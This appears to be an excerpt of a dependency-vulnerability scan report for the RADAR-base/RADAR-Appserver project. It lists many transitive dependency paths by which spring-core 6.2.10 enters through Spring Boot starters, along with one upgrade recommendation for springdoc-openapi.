Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-health@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-actuator@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-jackson@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-actuator@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
